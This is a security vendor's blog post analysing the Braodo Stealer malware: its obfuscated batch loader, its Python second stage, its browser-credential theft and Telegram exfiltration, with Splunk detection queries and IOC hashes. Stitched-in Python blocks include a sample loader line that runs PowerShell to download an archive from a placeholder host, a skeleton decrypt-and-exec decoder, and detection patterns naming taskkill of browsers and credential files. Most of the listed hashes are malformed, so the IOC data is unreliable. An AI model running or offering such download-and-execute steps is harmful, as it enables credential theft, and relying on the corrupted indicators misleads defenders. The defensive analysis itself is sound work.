Splunk Inc.

11/21/2024 | News release | Distributed by Public on 11/21/2024 11:24

Cracking Braodo Stealer: Analyzing Python Malware and Its Obfuscated Loader

Braodo Stealer is one of the many active and evolving malware families designed to steal sensitive information, such as credentials, cookies, and system data, from compromised machines. Typically written in Python, this malware employs a variety of obfuscation techniques to conceal its true intentions, making it challenging for security solutions to identify.

This malware leverages popular developer platforms like GitHub and GitLab for distributing its payloads, often utilizing these repositories to host malicious code disguised as legitimate projects. Furthermore, it employs Telegram bots as command-and-control (C2) channels, allowing attackers to communicate stealthily and exfiltrate stolen data efficiently.

In this blog, the Splunk Threat Research Team will share an analysis of Braodo Stealer. We will break down its loader mechanisms, obfuscation strategies, and payload behavior to provide a clearer understanding of its operations. Additionally, we will share insights into detection techniques and defense strategies to empower security professionals in identifying and mitigating this growing threat effectively.

Code Repositories (T1213)

The Splunk Threat Research Team has observed several active Braodo Stealer campaigns in the wild, abusing popular developer platforms like GitHub and GitLab, which allow developers to create, store, manage, and share their code. These platforms are abused to host and distribute malicious payloads, as seen in various campaigns. Notably, security researchers, including @suyog41, have shared insights into the latest variants of this malware family.

Figures 01 and 02 below show one such GitLab repository and one such GitHub repository, each storing an archive package that contains the Braodo Stealer payload. The batch script loader later downloads this payload as part of the malware's infection process.

Figure 01: GitLab repository hosting Braodo Stealer

Figure 02: GitHub repository hosting Braodo Stealer

Loader (Batch Script)

Command Obfuscation (T1027.010)

The Braodo Stealer campaign commonly employs an obfuscated batch script as a loader for its actual Python payload. This batch script utilizes various techniques designed to hinder static analysis, making it more difficult for security researchers to detect and analyze its behavior.

Random Named Environment Variable

Braodo Stealer utilizes randomly named environment variables to obfuscate the actual script it intends to execute. These variables are used to dynamically construct the batch script at runtime, making static analysis significantly more difficult. However, this obfuscation can be reversed using techniques such as string replacement or the print method, as detailed in the Splunk Threat Research Team's blog AsyncRAT Crusade: Detections and Defense.

Figure 03: Randomly named environment variables

Byte Order Mark (BOM) and Obfuscator

The Splunk Threat Research Team also observed that Braodo Stealer employed the use of a Byte Order Mark (BOM) in its batch script to deceive text editors and certain command-line tools into interpreting the script as Unicode. This tactic causes the script to appear like gibberish or as though it is written in another language, effectively making it harder to analyze and understand.

Additionally, once the BOM bytes are removed from the batch script, it becomes evident that Braodo Stealer uses an open-source batch script obfuscator called ABOBUS. This obfuscator can apply up to 10 layers of various obfuscation techniques, significantly complicating efforts to recover the original batch script that is set to be executed. These multiple layers of obfuscation are designed to make reverse engineering and analysis more challenging.

Figure 04 provides a screenshot illustrating the appearance of the heavily obfuscated batch script before and after removing the byte order mark bytes.

Figure 04: ABOBUS Obfuscator
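To make the reversal described above concrete, here is an added example (not code from the Splunk Threat Research Team and not the malware's own loader): a small Python deobfuscator that strips a leading byte order mark, records every `set` assignment, and resolves `%name%` references by string replacement, the same idea as the technique referenced from the AsyncRAT post. The sample script, the variable names and the URL are constructed placeholders, and support for the `%name:~start,len%` substring form is an assumption about what such loaders commonly use rather than something this post shows.

```python
from __future__ import annotations

import re

# Byte order marks that obfuscated loaders prepend to an otherwise ASCII script.
BOMS = (b"\xef\xbb\xbf", b"\xff\xfe", b"\xfe\xff")

# set "NAME=value"  or  set NAME=value   (cmd.exe treats the keyword case-insensitively)
SET_RE = re.compile(r'^\s*set\s+"?([^=\s"]+)=([^"\r\n]*)"?\s*$', re.IGNORECASE)
# %NAME%, %NAME:~start%, %NAME:~start,len%  (substring form is an assumption, see lead-in)
REF_RE = re.compile(r"%([A-Za-z0-9_]+)(?::~(-?\d+)(?:,(-?\d+))?)?%")


def strip_bom(data: bytes) -> str:
    """Drop a leading BOM and decode the rest as single-byte text (the body is plain ANSI)."""
    for bom in BOMS:
        if data.startswith(bom):
            data = data[len(bom):]
            break
    return data.decode("latin-1")


def substring(value: str, start: int, length: int | None) -> str:
    """Apply cmd.exe %var:~start,len% semantics (negative start/len count from the end)."""
    if length is None:
        return value[start:]
    if length < 0:
        return value[start:length]
    end = start + length
    if start < 0 and end >= 0:
        return value[start:]
    return value[start:end]


def expand(text: str, env: dict[str, str]) -> str:
    """Replace %var% references with known values; unknown names are left untouched."""
    def sub(m: re.Match) -> str:
        name = m.group(1).lower()
        if name not in env:
            return m.group(0)
        value = env[name]
        if m.group(2) is None:
            return value
        length = int(m.group(3)) if m.group(3) is not None else None
        return substring(value, int(m.group(2)), length)

    for _ in range(16):  # nested references resolve over several passes; cap to avoid loops
        new_text = REF_RE.sub(sub, text)
        if new_text == text:
            break
        text = new_text
    return text


def deobfuscate(data: bytes) -> list[str]:
    """Return the script's non-`set` lines with every variable reference resolved."""
    env: dict[str, str] = {}
    output: list[str] = []
    for line in strip_bom(data).splitlines():
        m = SET_RE.match(line)
        if m:
            env[m.group(1).lower()] = expand(m.group(2), env)
            continue
        if line.strip():
            output.append(expand(line, env))
    return output


# Constructed sample: a UTF-16 BOM glued onto an ASCII batch script that assembles its
# command from randomly named variables. The URL is a placeholder, not a real indicator.
SAMPLE = b"\xff\xfe" + b"\r\n".join([
    b"@echo off",
    b'set "qZx=powershell"',
    b'set "mWv=-Command"',
    b'set "hJk=xxInvoke-WebRequestyy"',
    b'%qZx% %mWv% "%hJk:~2,17% https://gitlab.example.invalid/archive.zip -OutFile %TEMP%\\a.zip"',
])

if __name__ == "__main__":
    for line in deobfuscate(SAMPLE):
        print(line)
```

Run it against a real loader only after the ABOBUS layers have been peeled back; the script resolves references known at parse time and leaves anything it cannot resolve (here `%TEMP%`) in place so the analyst can see what is still dynamic.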

Leveraging this knowledge of the obfuscator, the Splunk Threat Research Team was able to hunt for additional new samples with very low detection rates on VirusTotal, as demonstrated in Figure 05. This shows how threat actors are using this obfuscator to evade detection.

Figure 05: Threat Hunting Braodo Stealer Loader

By analyzing the code of the ABOBUS obfuscator, the Splunk Threat Research Team was able to deobfuscate the batch script loader, revealing its true intent, as shown in Figure 06.

The batch script is designed to execute a PowerShell command that downloads the actual payload from a GitLab or GitHub repository, which functions as its C2 server. The downloaded file is a zip archive containing several Python libraries along with a second-stage payload named "rz_317.pd." This Python script is responsible for decrypting and loading the actual Braodo Stealer, completing the infection chain.

Figure 06: Deobfuscated Braodo Stealer "ABOBUS Obfuscated" Loader

Second Stager (Python Script)

Encrypted/Encoded File (T1027.013)

Figure 07 presents a screenshot of the second-stage Python script, which is responsible for base64 decoding and decrypting the AES-encrypted Braodo Stealer payload stored in the "Error_cache.db" file. Once the payload is successfully decoded and decrypted, the script proceeds to execute it, completing the malware's deployment process.

Figure 07: Second Stage Python Script
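As an added example (not from this post and not the malware authors' code), the following Python applies the static-triage check a defender would want after reading this section: it parses a candidate second-stage script with the `ast` module, without executing it, and flags the combination of base64/crypto imports with an `exec()` or `eval()` whose argument is not a literal, which is the shape of the decoder in Figure 07. Both sample scripts are constructed inputs (the "stage 2" one is a non-functional skeleton, `KEY` is undefined on purpose), and the list of suspect modules is an assumption rather than something taken from the Braodo sample.

```python
from __future__ import annotations

import ast

# Module families whose import alongside a dynamic exec()/eval() is characteristic of an
# encoded-then-decrypted second stage. Assumed list, not derived from the Braodo sample.
SUSPECT_MODULES = {"base64", "Crypto", "Cryptodome", "cryptography", "zlib", "marshal"}
DYNAMIC_EXEC = {"exec", "eval", "compile"}


def call_name(node: ast.Call) -> str | None:
    """Bare name of the called function, covering both exec(...) and builtins.exec(...)."""
    if isinstance(node.func, ast.Name):
        return node.func.id
    if isinstance(node.func, ast.Attribute):
        return node.func.attr
    return None


def triage(source: str) -> dict:
    """Parse without executing; report suspect imports and exec()/eval() of non-literal data."""
    tree = ast.parse(source)
    imported: set[str] = set()
    dynamic: list[tuple[str, int]] = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            imported.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module:
            imported.add(node.module.split(".")[0])
        elif isinstance(node, ast.Call):
            name = call_name(node)
            # A literal string passed to exec() is readable on the page; a variable is not.
            if name in DYNAMIC_EXEC and node.args and not isinstance(node.args[0], ast.Constant):
                dynamic.append((name, node.lineno))
    suspect = sorted(imported & SUSPECT_MODULES)
    return {
        "suspect_imports": suspect,
        "dynamic_exec": dynamic,
        "verdict": "suspicious" if suspect and dynamic else "clean",
    }


# Constructed input shaped like the decoder described above (skeleton only; KEY is undefined).
STAGE2_SAMPLE = '''
import base64
from Crypto.Cipher import AES

def load(path):
    blob = base64.b64decode(open(path, "rb").read())
    cipher = AES.new(KEY, AES.MODE_CBC, iv=blob[:16])
    code = cipher.decrypt(blob[16:])
    exec(code)
'''

# Constructed benign input: reads data but never hands it to exec()/eval().
BENIGN_SAMPLE = '''
import json

def load(path):
    with open(path) as fh:
        return json.load(fh)
'''

if __name__ == "__main__":
    for label, src in (("stage2", STAGE2_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, triage(src))
```

Because the check is purely syntactic it is cheap to run over every `.py` file in an unpacked archive like the one the loader downloads; a `suspicious` verdict is a triage signal to examine the file in a sandbox, not a conviction on its own.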

Braodo Stealer Tactics and Techniques

Registry Run Keys (T1547.001)

Some variants of Braodo Stealer use registry run keys to gain persistence on the compromised host, so that the malware survives reboots and its code executes automatically at system startup.

Figure 08: Registry Run Keys

Screen Capture (T1113)

Figure 09 provides a screenshot showcasing Braodo's functionality for capturing an image of the compromised host's screen. The screenshot is saved as "screenshot.png" in the %temp% folder and is included in the archive of collected data, along with browser credentials, cookies, and other sensitive information.

Figure 09: Screen Capture Capability

Clipboard Data (T1115)

In addition to its screen capture capability, Braodo Stealer also collects clipboard data, which can serve as a valuable source of sensitive information such as usernames and passwords that the user may have copied and pasted on the compromised host.

Figure 10: Collect Clipboard Data

System Information Discovery (T1082)

As part of its beaconing and data exfiltration process, Braodo Stealer gathers various system details, including the country code, city, OS version, username, and hostname. It also collects a list of running processes, which is saved to "%temp%/window.txt" using the tasklist command-line tool. This information is used to better understand the compromised environment and facilitate further malicious actions.

Figure 11: System Information

Figure 12: Process List

Credentials from Web Browsers (T1555.003)

The primary functionality of Braodo Stealer is to collect and exfiltrate credentials, particularly from web browsers. Figure 13 displays a code snippet from one variant of Braodo Stealer, showing its ability to target popular browsers such as Chrome, Firefox, MS Edge, Opera, Brave, and Chromium. The malware decodes and decrypts credentials stored within these browsers. To avoid access errors when extracting encrypted data like master keys and passwords, Braodo Stealer first attempts to terminate the main browser process before proceeding with the decryption.

Figure 13: Targeted Browser

Figure 14 presents a screenshot of the data collected by Braodo Stealer, including decrypted passwords and usernames extracted from targeted web browsers. This information is stored in the %temp% folder, then archived for exfiltration to the malware's C2 server.

Figure 14: Braodo Stealer Collected Data

Exfiltration Over C2 Channel (T1041)

This malware utilizes a Telegram bot as its C2 server, enabling it to transmit all collected sensitive data from the compromised host to the attackers. Telegram's API is leveraged for stealthy and efficient communication.

Figure 15: Telegram Bot C2 server

Detections

Windows Credentials from Web Browsers Saved in TEMP Folder

The following analytic detects the creation of files containing passwords, cookies, and saved login account information by the Braodo Stealer malware in temporary folders. Braodo often collects these credentials from browsers and applications, storing them in temp directories before exfiltration.

|tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem
where Filesystem.file_name IN ("login*", "pass*","cookie*","master_key*") Filesystem.file_path = "*\\temp\\*"
by _time Filesystem.file_name Filesystem.file_path Filesystem.dest Filesystem.file_create_time
| `drop_dm_object_name(Filesystem)`
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`

Figure 16: Windows Credentials from Web Browsers Saved in TEMP Folder Detection

Windows Credentials from Password Stores Chrome Copied in TEMP Folder

The following analytic detects the copying of Chrome's Local State and Login Data files into temporary folders, a tactic often used by the Braodo stealer malware. These files contain encrypted user credentials, including saved passwords and login session details.

|tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem
where Filesystem.file_name IN ("*Local State*", "*Login Data*") Filesystem.file_path = "*\\temp\\*"
by _time Filesystem.file_name Filesystem.file_path Filesystem.dest Filesystem.file_create_time
| `drop_dm_object_name(Filesystem)`
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`

Figure 17: Windows Credentials from Password Stores Chrome Copied in TEMP Folder

Windows Disable or Stop Browser Process

The following analytic detects the use of the taskkill command in a process command line to terminate several known browser processes, a technique commonly employed by the Braodo stealer malware to steal credentials. By forcefully closing browsers like Chrome, Edge, and Firefox, the malware can unlock files that store sensitive information, such as passwords and login data.

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
where Processes.process = "*taskkill*" Processes.process IN("*chrome.exe","*firefox.exe","*brave.exe","*opera.exe","*msedge.exe","*chromium.exe")
by Processes.dest Processes.user Processes.parent_process Processes.parent_process_name Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id
| `drop_dm_object_name(Processes)`
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`

Figure 18: Windows Disable or Stop Browser Process Detection

Windows Screen Capture in TEMP folder

The following analytic detects the creation of screen capture files by the Braodo Stealer malware. This stealer is known to capture screenshots of the victim's desktop as part of its data theft activities. The detection focuses on identifying unusual screen capture activity, especially when images are saved in directories often used by malware, such as temporary or hidden folders.

|tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem
where Filesystem.file_name IN ("screenshot.png", "screenshot.jpg","screenshot.bmp") Filesystem.file_path = "*\\temp\\*"
by _time Filesystem.file_name Filesystem.file_path Filesystem.dest Filesystem.file_create_time
| `drop_dm_object_name(Filesystem)`
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`

Figure 19: Windows Screen Capture in TEMP Folder Detection

Windows Archived Collected Data In TEMP Folder

The following analytic detects the creation of archived files in a temporary folder, which may contain collected data. This behavior is often associated with malicious activity, where attackers compress sensitive information before exfiltration.

|tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem
where Filesystem.file_name IN ("*.zip", "*.rar", "*.tar", "*.7z") Filesystem.file_path = "*\\temp\\*"
by _time Filesystem.file_name Filesystem.file_path Filesystem.dest Filesystem.file_create_time
| `drop_dm_object_name(Filesystem)`
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`

Figure 20: Windows Archived Collected Data In TEMP Folder Detection
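The following added Python (not part of the Splunk security content) re-implements the matching logic of the analytics above that have distinct file-name lists (browser credential files, screenshot files, archives) together with the taskkill Processes analytic, and runs it over constructed endpoint events so the wildcard semantics can be checked offline. The events, hostnames and paths are constructed, and `fnmatch` is used as an approximation of SPL's `*` wildcard.

```python
from __future__ import annotations

import fnmatch

# File-name patterns from the Filesystem analytics, keyed by analytic name.
FILESYSTEM_RULES = {
    "Windows Credentials from Web Browsers Saved in TEMP Folder":
        ("login*", "pass*", "cookie*", "master_key*"),
    "Windows Screen Capture in TEMP folder":
        ("screenshot.png", "screenshot.jpg", "screenshot.bmp"),
    "Windows Archived Collected Data In TEMP Folder":
        ("*.zip", "*.rar", "*.tar", "*.7z"),
}
TEMP_PATH = "*\\temp\\*"  # SPL "*\\temp\\*" once the escaped backslashes are resolved

# Patterns from "Windows Disable or Stop Browser Process". They carry no trailing wildcard,
# so the process field must END with the browser image name for the analytic to fire.
BROWSER_PATTERNS = ("*chrome.exe", "*firefox.exe", "*brave.exe",
                    "*opera.exe", "*msedge.exe", "*chromium.exe")


def spl_like(value: str, pattern: str) -> bool:
    """Approximate SPL wildcard matching: '*' matches any run of characters, case-insensitively."""
    return fnmatch.fnmatchcase(value.lower(), pattern.lower())


def filesystem_hits(event: dict) -> list[str]:
    """Names of the Filesystem analytics a file-creation event would satisfy."""
    if not spl_like(event.get("file_path", ""), TEMP_PATH):
        return []
    name = event.get("file_name", "")
    return [rule for rule, patterns in FILESYSTEM_RULES.items()
            if any(spl_like(name, p) for p in patterns)]


def process_hits(event: dict) -> list[str]:
    """Names of the Processes analytics a process-creation event would satisfy."""
    cmd = event.get("process", "")
    if spl_like(cmd, "*taskkill*") and any(spl_like(cmd, p) for p in BROWSER_PATTERNS):
        return ["Windows Disable or Stop Browser Process"]
    return []


def run_detections(events: list[dict]) -> list[tuple[str, str]]:
    """Evaluate every event against every analytic; returns (analytic, dest) pairs."""
    hits: list[tuple[str, str]] = []
    for ev in events:
        matched = filesystem_hits(ev) if "file_name" in ev else process_hits(ev)
        hits.extend((rule, ev["dest"]) for rule in matched)
    return hits


# Constructed endpoint events (not real telemetry) in the shape of the Endpoint data model.
TEMP = "C:\\Users\\alice\\AppData\\Local\\Temp\\"
EVENTS = [
    {"dest": "ws01", "file_name": "passwords.txt", "file_path": TEMP + "passwords.txt"},
    {"dest": "ws01", "file_name": "screenshot.png", "file_path": TEMP + "screenshot.png"},
    {"dest": "ws01", "file_name": "collected.zip", "file_path": TEMP + "collected.zip"},
    {"dest": "ws02", "file_name": "login.html",
     "file_path": "C:\\Users\\alice\\Documents\\login.html"},
    {"dest": "ws01", "process_name": "taskkill.exe",
     "process": "taskkill /F /IM chrome.exe /IM msedge.exe"},
    {"dest": "ws02", "process_name": "taskkill.exe", "process": "taskkill /F /IM notepad.exe"},
]

if __name__ == "__main__":
    for rule, dest in run_detections(EVENTS):
        print(f"{dest}: {rule}")
```

Two properties of the published queries become visible when the logic is run this way: a credential file written outside a `\temp\` path (event four) never matches, and the taskkill analytic only fires when a browser image name is the final token of the command line, so a `/IM chrome.exe` that is followed by other arguments is caught only because `msedge.exe` closes the line.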

IOCs

Description: Braodo Stealer batch script loader
Hashes:
acd8bcad4e9503790b4fff4f34d860e4e88d0be31b3cf552ca88
76a2b135bcbbafe020b6e94fb55c1e8430894f00da2face01353d
22583c3f09a36fd5c97edc7d68de1e066be502f1725beb21b368f
9f7657bd2239d13cd5d09a512102a0558993cdc922c9ca8167a1d
9995549ed9b92015c4256b168e6fecd50be4774455c0741729ff5
2341713e74ef1fd27cd46fa055569617a349c214e9d8d3013521b
08771afe8a3295930c340bbd0f423a068c39e1733f835141ac21a
dde387ef1e67bbd4b0c3775006d1b40466a97cec3e6d3a974db7f
8ea5aae87efcd739a1f856efacec4df25baa352fb218cda492346
ba7dd08b8215f772a25d7437fc5717318a663b5fef5f87ad0f462
b5db50b3c072357a3df81900eda773077c5c9fa2b90d72a9551a8
a633e4d5a255ba8ddfeeb0de1e6f4a580b02a36814d82a43f29e dce7b9e3464a923e672fc4faf4094f7ac00c2f6bc30bfbb3839b7
7b28dd6f70b93f78966e001e7777efafefdcf88df5c7672620994
9f18e0b0da49610eeb6ec5be640f741511ee53b3518990f1ad8df
4dac0b51016f954f0933f0f2cced5ff863fd36daec14dfb4fa393
b4bbeaecc466631acf3f62e8a7aad2e7ca9c6fafacc937da771ca
eda517fecfc1c2c1e9e6889cd506190ab3335e338dbc00ce41127
99ffe5177ba137139b9f3446c49ee53578c9f2a6530a046f3e392
57cf996e27939c87e032084bc00801e5452fc3776c41786c77dc7
e0b48da46874865f2b262ad8e22ef8807c90598599d99e0953134
171c9976f979aa1dc5785d2d1c3badb4b030e457961692fb84f2b
3324bf770bf8bc3db0bb90e0f13f1cae0a7acbb30777c93649d1a
b663683b4fb7f951ff70c63ec4552aa30d0c70d5041a37b24abee
25d002f74153ebc8416393d0c031db12f5e28166b3f7cc3b70c9b
5131d155e674b6f65f031f8eba7f7a26c1d13c10255cc7e3d0ff2
1bca6343961b8045ff15b348caa50759eed7db38b41c54393df75
c11cac3c1e31f0713d4983f36595f63940322f7505ff5d4a93ff3
33e91f64fe66655fd4e038f68e6e787b39dbd3c4c44a577f6440a
Description: Braodo Python Package (.zip), which contains the Braodo decryption Python script loader and the encrypted Braodo Stealer payload
Hashes:
eebeddcb4c58e04f52d50382dcf13312af9aadd387329841e8e1
7ef81aa24a53306438b870c9488f8a0462cf13b61875121aa2fb
a09ddcc2ea32de61eb8cfa61c9fcc1998332eef1a5b3fe02eb9f
92e9b1922b1a1b8bd255c5ac0e952bfa81ceabe2da23509c5992
c3f204733c67760e6c81cea63253150868823310792547b9897f
9a441154478c080c0e6b59f6a235547f1c99d8dc3dda1a20ef91
71afcc01e3aefcb9bfcee7174c40a7b574706ef841f56c02d26f
8acb6a866fec9bcaa9d9f2b3be8b78427455183bfd5ffae78d11
516e0d12fef631b1eb68e2609e799843f2ecbbd9000709e49f2d
f5a7977577c29d87e9a1dfd5cee8a7fe847d91d2de260fdd42bc
023817ba0b28f21de171f5e2cb8edfd5c5d3c1e46709b6cd22de
20b11a29fc75ea036a3db221aa42dd53e3137614b9c27f6f6df9
5350386521f73117927db7c6920d9133894c2a61c136f6f4d44e
7b1e0eef95edb11f2e0b3870955bdd43095d9fe8a9bfefe40c5f
7f5d82474df7ed87df8e3423c9aefb6264ead34fefea43cdd978
fa4d9c0c35bd040964b6b24483dc28600da0d731b65e8f982ff7
ad10ebd23fbdba7e145d16dbee4b69487c2119aa6641a5177fb3
29f30d2a1139e55964e8bf511108d0142062ce563d83eec9a42a
a21737e41cebbe4e8a17f4484ecea38d3fafb4520db1d60c2e5d
572807b885280195aec1ddc0d3e7e1ec484
Description: Braodo Python Decryptor
Hash: 80fdf08742c6f90668a7f47d84597075ddd5de2c58ff3acb32fbbaba6314d285
Description: Braodo Stealer
Hash: ecd08093eae07e239b70d3d00b90c139173e548c3ec6e39462e93f4aef101de9

Learn More

This blog helps security analysts, blue teamers and Splunk customers identify Braodo Stealer malware by enabling the community to discover related tactics, techniques, and procedures used by threat actors and adversaries. You can implement the detections in this blog using the Enterprise Security Content Updates app or the Splunk Security Essentials app. To view the Splunk Threat Research Team's complete security content repository, visit research.splunk.com.

Feedback

Any feedback or requests? Feel free to put in an issue on GitHub and we'll follow up. Alternatively, join us on the Slack channel #security-research. Follow these instructions if you need an invitation to our Splunk user groups on Slack.

Contributors

We would like to thank Teoderick Contreras for authoring this post and the entire Splunk Threat Research Team for their contributions.